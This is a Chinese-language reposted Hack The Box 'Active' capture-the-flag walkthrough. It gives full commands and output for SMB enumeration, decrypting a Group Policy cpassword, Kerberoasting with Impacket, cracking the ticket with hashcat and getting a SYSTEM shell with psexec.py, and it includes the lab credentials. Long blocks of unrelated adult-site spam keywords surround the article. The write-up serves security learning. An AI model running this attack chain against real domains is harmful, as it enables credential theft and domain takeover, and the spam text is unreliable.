国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

活動目錄下的常見攻擊方式
2019-01-13   4hou

Active是一個很簡單的box,不過也提供了很多學習的機會。這個box包含了很多與Windows活動目錄相關的常見漏洞。你可以在這個box中進行SMB枚舉,這是一個不錯的練習機會。你也可以對Windows域使用kerberoasting,但如果你不是滲透測試員的話,是沒有機會這么做的。

Box詳情

偵察

  • Nmap

  • SMB

-SMB枚舉

-列出共享

共享復制-SMB

  • 遍歷

  • GPP密碼

  • 破解GPP密碼

用戶共享-SMB

Kerberoasting

  • 背景

  • 獲取哈希

  • 使用Hashcat破解

管理員權限

  • 共享遍歷

  • 獲取root.txt

  • System shell

Box詳情:

偵察

Nmap

Nmap結果顯示這是一臺Windows 2008 R2服務器,而且是活動目錄域控。


  1. root@kali:~/hackthebox/active-10.10.10.100# nmap -sT -p- --min-rate 5000 -oA nmap/alltcp 10.10.10.100 

  2. Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-28 21:35 EDT 

  3. Nmap scan report for 10.10.10.100                            

  4. Host is up (0.020s latency).                                                                                               

  5. Not shown: 65512 closed ports  

  6. PORT      STATE SERVICE    

  7. 53/tcp    open  domain 

  8. 88/tcp    open  kerberos-sec 

  9. 135/tcp   open  msrpc 

  10. 139/tcp   open  netbios-ssn 

  11. 389/tcp   open  ldap 

  12. 445/tcp   open  microsoft-ds 

  13. 464/tcp   open  kpasswd5 

  14. 593/tcp   open  http-rpc-epmap              

  15. 636/tcp   open  ldapssl                                         

  16. 3268/tcp  open  globalcatLDAP 

  17. 3269/tcp  open  globalcatLDAPssl                     

  18. 5722/tcp  open  msdfsr                               

  19. 9389/tcp  open  adws 

  20. 47001/tcp open  winrm 

  21. 49152/tcp open  unknown 

  22. 49153/tcp open  unknown                              

  23. 49154/tcp open  unknown 

  24. 49155/tcp open  unknown 

  25. 49157/tcp open  unknown 

  26. 49158/tcp open  unknown 

  27. 49169/tcp open  unknown 

  28. 49170/tcp open  unknown 

  29. 49179/tcp open  unknown 

  30.                                                                                              

  31. Nmap done: 1 IP address (1 host up) scanned in 13.98 seconds 

  32.  

  33. root@kali:~/hackthebox/active-10.10.10.100# nmap -sV -sC -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152-49158,49169,49170,49179 --min-rate 5 

  34. 000 -oA nmap/scripts 10.10.10.100                    

  35. Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-28 21:37 EDT 

  36. Nmap scan report for 10.10.10.100                                                                                                                                 

  37. Host is up (0.020s latency).                

  38.                         

  39. PORT      STATE  SERVICE       VERSION                                                         

  40. 53/tcp    open   domain        Microsoft DNS 6.1.7600 (1DB04001) (Windows Server 2008 R2) 

  41. | dns-nsid: 

  42. |_  bind.version: Microsoft DNS 6.1.7600 (1DB04001) 

  43. 88/tcp    open   kerberos-sec  Microsoft Windows Kerberos (server time: 2018-07-29 01:37:17Z) 

  44. 135/tcp   open   msrpc         Microsoft Windows RPC 

  45. 139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn 

  46. 389/tcp   open   ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name

  47. 445/tcp   open   microsoft-ds? 

  48. 464/tcp   open   kpasswd5? 

  49. 593/tcp   open   ncacn_http    Microsoft Windows RPC over HTTP 1.0 

  50. 636/tcp   open   tcpwrapped 

  51. 3268/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name

  52. 3269/tcp  open   tcpwrapped 

  53. 5722/tcp  open   msrpc         Microsoft Windows RPC 

  54. 9389/tcp  open   mc-nmf        .NET Message Framing 

  55. 47001/tcp open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 

  56. |_http-server-header: Microsoft-HTTPAPI/2.0 

  57. |_http-title: Not Found 

  58. 49152/tcp open   msrpc         Microsoft Windows RPC 

  59. 49153/tcp open   msrpc         Microsoft Windows RPC 

  60. 49154/tcp open   msrpc         Microsoft Windows RPC 

  61. 49155/tcp open   msrpc         Microsoft Windows RPC 

  62. 49156/tcp closed unknown 

  63. 49157/tcp open   ncacn_http    Microsoft Windows RPC over HTTP 1.0 

  64. 49158/tcp open   msrpc         Microsoft Windows RPC 

  65. 49169/tcp open   msrpc         Microsoft Windows RPC 

  66. 49170/tcp open   msrpc         Microsoft Windows RPC 

  67. 49179/tcp open   msrpc         Microsoft Windows RPC 

  68. Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2, cpe:/o:microsoft:windows 

  69.  

  70. Host script results: 

  71. |_clock-skew: mean: -35s, deviation: 0s, median: -35s 

  72. |_nbstat: NetBIOS name: DC, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:a2:16:8b (VMware) 

  73. | smb2-security-mode: 

  74. |   2.02: 

  75. |_    Message signing enabled and required 

  76. | smb2-time

  77. |   date: 2018-07-28 21:38:11 

  78. |_  start_date: 2018-07-28 15:00:50 

  79.  

  80. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 

  81. Nmap done: 1 IP address (1 host up) scanned in 150.56 seconds 

  82.  

  83. root@kali:~/hackthebox/active-10.10.10.100# nmap -sU -p- --min-rate 5000 -oA nmap/alludp 10.10.10.100 

  84. Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-28 21:40 EDT 

  85. Warning: 10.10.10.100 giving up on port because retransmission cap hit (10). 

  86. Nmap scan report for 10.10.10.100 

  87. Host is up (0.021s latency). 

  88. Not shown: 65385 open|filtered ports, 145 closed ports 

  89. PORT      STATE SERVICE 

  90. 123/udp   open  ntp 

  91. 137/udp   open  netbios-ns 

  92. 49413/udp open  unknown 

  93. 49616/udp open  unknown 

  94. 65096/udp open  unknown 

SMB-TCP 139/445

SMB遍歷

如果是一臺Windows主機,那么我會看看SMB。一般我都會使用多種工具來對主機進行SMB遍歷。我還寫了一篇博客,講解各種SMB遍歷的工具。然后lppsec又告訴我一個工具smbmap,那會兒我剛寫完那篇博客,剛剛更新完SMB枚舉checklist,不過我又去編輯那篇博客,添加了smbmap這個工具的使用原理和使用步驟。

列出共享

我剛開始使用enum4linux這個工具進行了枚舉,但是這個工具有個問題,它dump了一堆信息,不過大多時候,這些信息都沒什么用。返回來的信息都很難理解,下面是輸出結果中比較有用的部分:


  1. root@kali:/opt/ad-ldap-enum# enum4linux -a 10.10.10.100 

  2. ...[snip]... 

  3.  ========================================= 

  4. |    Share Enumeration on 10.10.10.100    | 

  5.  ========================================= 

  6.  

  7.         Sharename       Type      Comment 

  8.         ---------       ----      ------- 

  9.         ADMIN$          Disk      Remote Admin 

  10.         C$              Disk      Default share 

  11.         IPC$            IPC       Remote IPC 

  12.         NETLOGON        Disk      Logon server share 

  13.         Replication     Disk 

  14.         SYSVOL          Disk      Logon server share 

  15.         Users           Disk 

  16. Reconnecting with SMB1 for workgroup listing. 

  17. Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) 

  18. Failed to connect with SMB1 -- no workgroup available 

  19.  

  20. [+] Attempting to map shares on 10.10.10.100 

  21. //10.10.10.100/ADMIN$   Mapping: DENIED, Listing: N/A 

  22. //10.10.10.100/C$       Mapping: DENIED, Listing: N/A 

  23. //10.10.10.100/IPC$     Mapping: OK     Listing: DENIED 

  24. //10.10.10.100/NETLOGON Mapping: DENIED, Listing: N/A 

  25. //10.10.10.100/Replication      Mapping: OK, Listing: OK 

  26. //10.10.10.100/SYSVOL   Mapping: DENIED, Listing: N/A 

  27. //10.10.10.100/Users    Mapping: DENIED, Listing: N/A 

  28. ...[snip]... 

而smbmap工具的輸出結果就非常清楚,一目了然,如圖所示,還顯示了我們不經認證就有Replication Share的讀取權限


  1. root@kali:~/hackthebox/active-10.10.10.100# smbmap -H 10.10.10.100 

  2. [+] Finding open SMB ports.... 

  3. [+] User SMB session establishd on 10.10.10.100... 

  4. [+] IP: 10.10.10.100:445        Name: 10.10.10.100                                       

  5.         Disk                                                    Permissions 

  6.         ----                                                    ----------- 

  7.         ADMIN$                                                  NO ACCESS 

  8.         C$                                                      NO ACCESS 

  9.         IPC$                                                    NO ACCESS 

  10.         NETLOGON                                                NO ACCESS 

  11.         Replication                                             READ ONLY 

  12.         SYSVOL                                                  NO ACCESS 

  13.         Users                                                   NO ACCESS 

Replication share –SMB

枚舉

因為我可以不用密碼就直接訪問\\10.10.10.100\Replication,我將使用smbclient來連接并查看一番。


  1. root@kali:~/hackthebox/active-10.10.10.100# smbclient //10.10.10.100/Replication -U ""%"" 

  2. Try "help" to get a list of possible commands.                             

  3. smb: \> 

或者,我也可以使用smbmap來遞歸列出share中的所有文件,命令如下:


  1. smbmap -H 10.10.10.100 -R 

哪種方法都行,我注意到了一個很有意思的文件Groups.xml,內容如下:


  1. smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls 
  2.   .                                   D        0  Sat Jul 21 06:37:44 2018 
  3.   ..                                  D        0  Sat Jul 21 06:37:44 2018 
  4.   Groups.xml                          A      533  Wed Jul 18 16:46:06 2018 

它有username和cpassword字段:


  1. <?xml version="1.0" encoding="utf-8"?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"
  2.   <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"
  3.     <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/> 
  4.   </User></Groups> 

GPP密碼

只要創建了一個新的GPP(組策略首選項),都會在SYSVOL share中創建一個數據配置的xml文件,包括任何與GPP相關的密碼。不過,為了安全起見,在存儲之前,Microsoft AES對密碼進行了加密處理。但是,Microsoft又在MSDN上發布了秘鑰。

微軟在2014年發布了一個補丁,防止管理員將密碼寫入GPP。但是這個補丁對于那些已存在的可破解的密碼不起任何作用。而且據我所知,滲透測試員在2018年也經常能夠發現這些秘鑰。更多詳情,請看這篇博客:AD security。

破解GPP密碼

既然得到了秘鑰,我們就可以進行破解了。Kali上有一個工具gpp-decrypt可以破解:


  1. root@kali:~/hackthebox/active-10.10.10.100/smb-loot# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ 
  2. GPPstillStandingStrong2k18 

用戶共享-SMB

有了用戶名和密碼,我又能多訪問3個share了。


  1. root@kali:~/hackthebox/active-10.10.10.100/smb-loot# smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 
  2. [+] Finding open SMB ports.... 
  3. [+] User SMB session establishd on 10.10.10.100... 
  4. [+] IP: 10.10.10.100:445    Name: 10.10.10.100                                       
  5.         Disk                  Permissions 
  6.         ----                  ----------- 
  7.         ADMIN$                 NO ACCESS 
  8.         C$                    NO ACCESS 
  9.         IPC$                   NO ACCESS 
  10.         NETLOGON                READ ONLY 
  11.         Replication               READ ONLY 
  12.         SYSVOL                 READ ONLY 
  13.         Users                  READ ONLY 

當我連接到用戶共享時,看起來有點像是C:\Users\目錄,事實上就是這個目錄:


  1. root@kali:~/hackthebox/active-10.10.10.100# smbclient //10.10.10.100/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18                                                                                                          
  2. Try "help" to get a list of possible commands. 
  3. smb: \> dir 
  4.   .           DR        0  Sat Jul 21 10:39:20 2018 
  5.   ..           DR        0  Sat Jul 21 10:39:20 2018 
  6.   Administrator     D         0  Mon Jul 16 06:14:21 2018 
  7.   All Users       DHS        0  Tue Jul 14 01:06:44 2009 
  8.   Default        DHR        0  Tue Jul 14 02:38:21 2009 
  9.   Default User     DHS        0  Tue Jul 14 01:06:44 2009 
  10.   desktop.ini      AHS        174  Tue Jul 14 00:57:55 2009 
  11.   Public         DR        0  Tue Jul 14 00:57:55 2009 
  12.   SVC_TGS         D         0  Sat Jul 21 11:16:32 2018 
  13.  
  14.       10459647 blocks of size 4096. 6308502 blocks available 

這樣一來,我們就有足夠的權限來訪問user.txt文件了。


  1. smb: \SVC_TGS\desktop\> get user.txt 
  2. getting file \SVC_TGS\desktop\user.txt of size 34 as user.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec) 
  3. root@kali:~/hackthebox/active-10.10.10.100# cat user.txt 
  4. 86d67d8b... 

Kerberoasting

背景

Kerberos是Windows活動目錄環境中用于身份認證的協議(當然它也可以用于Linux主機的身份認證)。2014年,Tim Medin演示了對kerberos的攻擊,他把這種攻擊叫做kerberoasting。這個演示非常值得一看,因為Tim用了圖文并茂的方式闡述了攻擊過程。這里我會嘗試簡單回顧一下。

如果你要使用Kerberos對某些服務進行身份驗證,你需要聯系DC并告訴它要對哪個系統服務進行身份驗證。它會使用服務用戶的密碼哈希對response進行加密然后返回給你。你再把該response發送給服務,該服務可以使用密碼對其進行解密,檢查你的身份,并確定是否允許你進入。

在Kerberoasting攻擊中,你不會將encrypted ticket從DC發送到服務,而是使用離線暴力來破解與服務相關的密碼。

獲取哈希

我將使用IMpacket工具中的GetUserSPNs.py腳本來獲取與普通用戶帳戶關聯的服務用戶名列表。它也會得到一個我可以破解的ticket。

該腳本跑完之后識別出了一個用戶,而且是管理員:


  1. root@kali:~/hackthebox/active-10.10.10.100# GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile GetUserSPNs.out 
  2. Impacket v0.9.16-dev - Copyright 2002-2018 Core Security Technologies 
  3.  
  4. Password
  5. ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet      LastLogon            
  6. --------------------  -------------  --------------------------------------------------------  -------------------  ------------------- 
  7. active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40  2018-07-21 11:05:53 

它也返回了一個ticket,我就可以嘗試暴力破解來得到用戶的密碼:


  1. root@kali:~/hackthebox/active-10.10.10.100# cat GetUserSPNs.out  
  2. $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$7028f37607953ce9fd6c9060de4aece5$55e2d21e37623a43d8cd5e36e39bfaffc52abead3887ca728d527874107ca042e0e9283ac478b1c91cab58c9184828e7a5e0af452ad2503e463ad2088ba97964f65ac10959a3826a7f99d2d41e2a35c5a2c47392f160d65451156893242004cb6e3052854a9990bac4deb104f838f3e50eca3ba770fbed089e1c91c513b7c98149af2f9a994655f5f13559e0acb003519ce89fa32a1dd1c8c7a24636c48a5c948317feb38abe54f875ffe259b6b25a63007798174e564f0d6a09479de92e6ed98f0887e19b1069b30e2ed8005bb8601faf4e476672865310c6a0ea0bea1ae10caff51715aea15a38fb2c1461310d99d6916445d7254f232e78cf9288231e436ab457929f50e6d4f70cbfcfd2251272961ff422c3928b0d702dcb31edeafd856334b64f74bbe486241d752e4cf2f6160b718b87aa7c7161e95fab757005e5c80254a71d8615f4e89b0f4bd51575cc370e881a570f6e5b71dd14f50b8fd574a04978039e6f32d108fb4207d5540b4e58df5b8a0a9e36ec2d7fc1150bb41eb9244d96aaefb36055ebcdf435a42d937dd86b179034754d2ac4db28a177297eaeeb86c229d0f121cf04b0ce32f63dbaa0bc5eafd47bb97c7b3a14980597a9cb2d83ce7c40e1b864c3b3a77539dd78ad41aceb950a421a707269f5ac25b27d5a6b7f334d37acc7532451b55ded3fb46a4571ac27fc36cfad031675a85e0055d31ed154d1f273e18be7f7bc0c810f27e9e7951ccc48d976f7fa66309355422124ce6fda42f9df406563bc4c20d9005ba0ea93fac71891132113a15482f3d952d54f22840b7a0a6000c8e8137e04a898a4fd1d87739bf5428d748086f0166b35c181729cc62b41ba6a9157333bb77c9e03dc9ac23782cf5dcebd11faad8ca3e3e74e25f21dc04ba9f1703bd51d100051c8f505cc8085056b94e349b57906ee8deaf026b3daa89e7c3fc747a6a31ae08376da259f3118370bef86b6e7c2f88d66400eccb122dec8028223f6dcde29ffaa5b83ecb1c3780a782a5797c527a26a7b51b62db3e4865ebc2a0a0d2c931550decb3e7ae581b59f070dd33e423a90ec2ef66982a1b6336afe968fa93f5dd2880a313dc05d4e5cf104b6d9a8316b9fe3dc16e057e0f5c835e111ab92795fb0033541916a57df8f8e6b8cc25ecff2775282ccee110c49376c2cec6b7bb95c265f1466994da89e69605594ead28d24212a137ee20197d8aa95f243c347e02616f40f4071c33f749f5b94d1259fd32174 

使用Hashcat破解

我會在這個網址查找哈希類型,然后使用Hashcat進行破解:


  1. ~/Dropbox/CTFs/hackthebox/active-10.10.10.100$ hashcat -m 13100 -a 0 GetUserSPNs.out /usr/share/wordlists/rockyou.txt --force                                        
  2. hashcat (v4.0.1) starting...  
  3. ...snip... 
  4. $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$7028f37607953ce9fd6c9060de4aece5$55e2d21e37623a43d8cd5e36e39bfaffc52abead3887ca728d527874107ca042e0e9283ac478b1c91cab58c9 
  5. 184828e7a5e0af452ad2503e463ad2088ba97964f65ac10959a3826a7f99d2d41e2a35c5a2c47392f160d65451156893242004cb6e3052854a9990bac4deb104f838f3e50eca3ba770fbed089e1c91c513b7c98149af2f9a 
  6. 994655f5f13559e0acb003519ce89fa32a1dd1c8c7a24636c48a5c948317feb38abe54f875ffe259b6b25a63007798174e564f0d6a09479de92e6ed98f0887e19b1069b30e2ed8005bb8601faf4e476672865310c6a0ea0b 
  7. ea1ae10caff51715aea15a38fb2c1461310d99d6916445d7254f232e78cf9288231e436ab457929f50e6d4f70cbfcfd2251272961ff422c3928b0d702dcb31edeafd856334b64f74bbe486241d752e4cf2f6160b718b87aa 
  8. 7c7161e95fab757005e5c80254a71d8615f4e89b0f4bd51575cc370e881a570f6e5b71dd14f50b8fd574a04978039e6f32d108fb4207d5540b4e58df5b8a0a9e36ec2d7fc1150bb41eb9244d96aaefb36055ebcdf435a42d 
  9. 937dd86b179034754d2ac4db28a177297eaeeb86c229d0f121cf04b0ce32f63dbaa0bc5eafd47bb97c7b3a14980597a9cb2d83ce7c40e1b864c3b3a77539dd78ad41aceb950a421a707269f5ac25b27d5a6b7f334d37acc7 
  10. 532451b55ded3fb46a4571ac27fc36cfad031675a85e0055d31ed154d1f273e18be7f7bc0c810f27e9e7951ccc48d976f7fa66309355422124ce6fda42f9df406563bc4c20d9005ba0ea93fac71891132113a15482f3d952 
  11. d54f22840b7a0a6000c8e8137e04a898a4fd1d87739bf5428d748086f0166b35c181729cc62b41ba6a9157333bb77c9e03dc9ac23782cf5dcebd11faad8ca3e3e74e25f21dc04ba9f1703bd51d100051c8f505cc8085056b 
  12. 94e349b57906ee8deaf026b3daa89e7c3fc747a6a31ae08376da259f3118370bef86b6e7c2f88d66400eccb122dec8028223f6dcde29ffaa5b83ecb1c3780a782a5797c527a26a7b51b62db3e4865ebc2a0a0d2c931550de 
  13. cb3e7ae581b59f070dd33e423a90ec2ef66982a1b6336afe968fa93f5dd2880a313dc05d4e5cf104b6d9a8316b9fe3dc16e057e0f5c835e111ab92795fb0033541916a57df8f8e6b8cc25ecff2775282ccee110c49376c2c 
  14. ec6b7bb95c265f1466994da89e69605594ead28d24212a137ee20197d8aa95f243c347e02616f40f4071c33f749f5b94d1259fd32174:Ticketmaster1968 

管理員權限

Share枚舉

現在,有了管理員的密碼,我們幾乎可以訪問所有的shares,包括C$,這會提供整個文件系統:


  1. root@kali:~/hackthebox/active-10.10.10.100/smb-loot# smbmap -H 10.10.10.100 -d active.htb -u administrator -p Ticketmaster1968 
  2. [+] Finding open SMB ports.... 
  3. [+] User SMB session establishd on 10.10.10.100... 
  4. [+] IP: 10.10.10.100:445        Name: 10.10.10.100                                       
  5.         Disk                                                    Permissions 
  6.         ----                                                    ----------- 
  7.         ADMIN$                                                  READ, WRITE 
  8.         C$                                                      READ, WRITE 
  9.         IPC$                                                    NO ACCESS 
  10.         NETLOGON                                                READ, WRITE 
  11.         Replication                                             READ ONLY 
  12.         SYSVOL                                                  READ, WRITE 
  13.         [!] Unable to remove test directory at \\10.10.10.100\SYSVOL\vnCfhEJMWA, plreae remove manually 
  14.         Users                                                   READ ONLY 

獲取root.txt

我可以使用smbclient或者smbmap來進行連接并獲取root.txt文件:


  1. root@kali:~/hackthebox/active-10.10.10.100# smbclient //10.10.10.100/C$ -U active.htb\\administrator%Ticketmaster1968 
  2. Try "help" to get a list of possible commands. 
  3. smb: \> get \users\administrator\desktop\root.txt 
  4. getting file \users\administrator\desktop\root.txt of size 34 as \users\administrator\desktop\root.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec) 
  5.  
  6. root@kali:~/hackthebox/active-10.10.10.100# cat root.txt 
  7. b5fc76d1... 

這里值得注意的是,我甚至沒有獲取系統的shell就拿到了系統中的root flag。

System shell

但我當然想getshell。現在這些shares是可寫的,而且我有管理員權限,我可以使用PSExec來getshell。直接在kali上就有很多方法進行提權,這里我還是使用Impacket這個工具,使用psexec.py這個腳本:


  1. root@kali:~/hackthebox/active-10.10.10.100# psexec.py active.htb/administrator@10.10.10.100 
  2. Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies 
  3.  
  4. Password
  5. [*] Requesting shares on 10.10.10.100..... 
  6. [*] Found writable share ADMIN$ 
  7. [*] Uploading file dMCaaHzA.exe 
  8. [*] Opening SVCManager on 10.10.10.100..... 
  9. [*] Creating service aYMa on 10.10.10.100..... 
  10. [*] Starting service aYMa..... 
  11. [!] Press help for extra shell commands 
  12. Microsoft Windows [Version 6.1.7601] 
  13. Copyright (c) 2009 Microsoft Corporation.  All rights reserved. 
  14.  
  15. C:\Windows\system32>whoami 
  16. nt authority\system 

熱詞搜索:

上一篇:網絡安全攻防技術:移動安全篇
下一篇:車聯網時代,傳統車廠該向互聯網產品經理們學習什么?

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
欧美精品一区二区三区久久久 | 国产福利91精品一区二区三区| 欧美日韩激情一区二区三区| 亚洲综合999| 91看片淫黄大片一级在线观看| 亚洲欧美日韩一区二区| 欧美日韩国产天堂| 久久69国产一区二区蜜臀| 久久久久久久久久久黄色| 91麻豆蜜桃一区二区三区| 免费观看成人av| 国产午夜精品久久| 欧美亚洲综合久久| 激情久久久久久久久久久久久久久久| 国产精品午夜电影| 欧美高清视频一二三区 | 99国产欧美久久久精品| 亚洲成人av电影| 久久久久久99久久久精品网站| 一本色道久久加勒比精品| 久久精品国产精品青草| 亚洲美女视频在线观看| 久久综合久久综合久久综合| 欧美日韩在线三区| 成人免费毛片片v| 亚洲成人免费电影| 欧美激情一区二区三区不卡 | 在线观看日韩精品| 国产白丝精品91爽爽久久| 亚洲大片一区二区三区| 国产精品麻豆视频| 日韩精品一区二区三区在线观看| 91麻豆福利精品推荐| 国产做a爰片久久毛片| 亚洲成人久久影院| 亚洲欧美日韩久久精品| 国产欧美精品一区| 欧美r级在线观看| 欧美日韩国产综合草草| 一本久道中文字幕精品亚洲嫩| 国产成人欧美日韩在线电影| 久99久精品视频免费观看| 丝袜亚洲另类丝袜在线| 亚洲国产精品久久人人爱| 亚洲日本va在线观看| 国产精品美女久久久久aⅴ| 久久网站最新地址| 精品成人一区二区三区四区| 日韩精品一区二区三区三区免费 | 久久99国产精品麻豆| 日本欧美在线看| 日本成人在线电影网| 日韩电影一二三区| 日本特黄久久久高潮| 麻豆精品一区二区| 国产一区二区在线免费观看| 男男成人高潮片免费网站| 日韩中文字幕不卡| 免费成人在线观看视频| 久久99精品国产麻豆不卡| 精久久久久久久久久久| 国产精品一区二区无线| 成人免费观看av| 不卡高清视频专区| 色综合中文字幕国产| 91女厕偷拍女厕偷拍高清| 91网站黄www| 欧美日韩在线观看一区二区| 欧美乱妇一区二区三区不卡视频| 正在播放亚洲一区| 久久综合九色欧美综合狠狠| 国产精品女上位| 亚洲男帅同性gay1069| 亚洲国产精品麻豆| 九九在线精品视频| aa级大片欧美| 7777精品伊人久久久大香线蕉完整版 | 日韩欧美成人午夜| 国产欧美日韩卡一| 亚洲色图一区二区三区| 亚洲综合视频在线观看| 日本成人在线一区| 成人国产免费视频| 欧美高清一级片在线| 中文字幕乱码日本亚洲一区二区 | 色一区在线观看| 欧美年轻男男videosbes| 日韩欧美在线影院| 亚洲欧洲色图综合| 久久狠狠亚洲综合| 色又黄又爽网站www久久| 日韩一区二区免费在线电影| 国产精品进线69影院| 亚洲国产va精品久久久不卡综合| 韩日欧美一区二区三区| 欧美做爰猛烈大尺度电影无法无天| 日韩一区二区三区观看| 亚洲精品久久久蜜桃| 韩国av一区二区三区在线观看| 一本到不卡免费一区二区| www精品美女久久久tv| 亚洲午夜精品在线| 成人黄色在线网站| 欧美大片在线观看| 天天色综合天天| 波多野结衣在线aⅴ中文字幕不卡| 欧美二区三区91| 一区二区在线免费观看| 成人精品视频网站| 久久麻豆一区二区| 日韩成人免费在线| 欧美日韩免费一区二区三区视频| 18欧美亚洲精品| 国产一区二区在线观看视频| 日韩一卡二卡三卡国产欧美| 亚洲午夜免费福利视频| 91久久精品国产91性色tv| 国产精品热久久久久夜色精品三区 | 色噜噜狠狠成人中文综合| 国产午夜久久久久| 国内不卡的二区三区中文字幕 | 久久综合久久综合久久| 日韩va亚洲va欧美va久久| 在线观看91精品国产入口| 日韩毛片在线免费观看| av在线不卡观看免费观看| 国产精品三级在线观看| 99re这里只有精品6| 中文字幕一区二区三中文字幕| 国产91精品久久久久久久网曝门| 久久久亚洲精品一区二区三区| 蜜桃视频一区二区三区| 欧美一卡在线观看| 蜜桃一区二区三区四区| 精品日韩一区二区三区| 国产精品中文字幕日韩精品| 337p日本欧洲亚洲大胆色噜噜| 精品一区二区三区免费播放| 精品成人私密视频| 高潮精品一区videoshd| 亚洲欧洲精品天堂一级| 色婷婷综合久久| 亚洲二区在线观看| 日韩一区二区影院| 国产精品1024| 亚洲精品国产一区二区三区四区在线 | 国产欧美日韩卡一| 色天使色偷偷av一区二区| 亚洲一区二区视频在线观看| 91精品午夜视频| 国产九色sp调教91| 亚洲精品免费在线观看| 欧美日本不卡视频| 精品无人区卡一卡二卡三乱码免费卡| 国产日韩av一区二区| 色先锋久久av资源部| 美女久久久精品| 国产精品每日更新在线播放网址| 欧美日韩另类国产亚洲欧美一级| 精品一区二区三区视频| 亚洲精品免费在线播放| 精品少妇一区二区三区日产乱码| 高潮精品一区videoshd| 亚洲va欧美va天堂v国产综合| 精品国产91九色蝌蚪| 91在线精品一区二区| 免费国产亚洲视频| 亚洲欧洲性图库| 日韩区在线观看| 99re66热这里只有精品3直播 | 666欧美在线视频| 国产精品一级黄| 午夜精品爽啪视频| 国产精品私人自拍| 日韩精品一区二区三区蜜臀| 91亚洲资源网| 国产乱人伦偷精品视频免下载| 亚洲影视资源网| 欧美国产成人在线| 欧美一区永久视频免费观看| 91老师片黄在线观看| 久久99蜜桃精品| 亚洲成人午夜电影| 亚洲狼人国产精品| 久久久www成人免费无遮挡大片| 欧美日韩亚洲综合| 色欧美88888久久久久久影院| 国产伦精品一区二区三区视频青涩 | 国产成人av电影免费在线观看| 午夜婷婷国产麻豆精品| 亚洲色图清纯唯美| 国产亚洲短视频| 精品国产电影一区二区| 欧美精品tushy高清| 欧美日韩综合在线| 欧美在线视频日韩| 91色porny在线视频| 成人精品国产一区二区4080 | 激情小说欧美图片| 日韩成人午夜电影|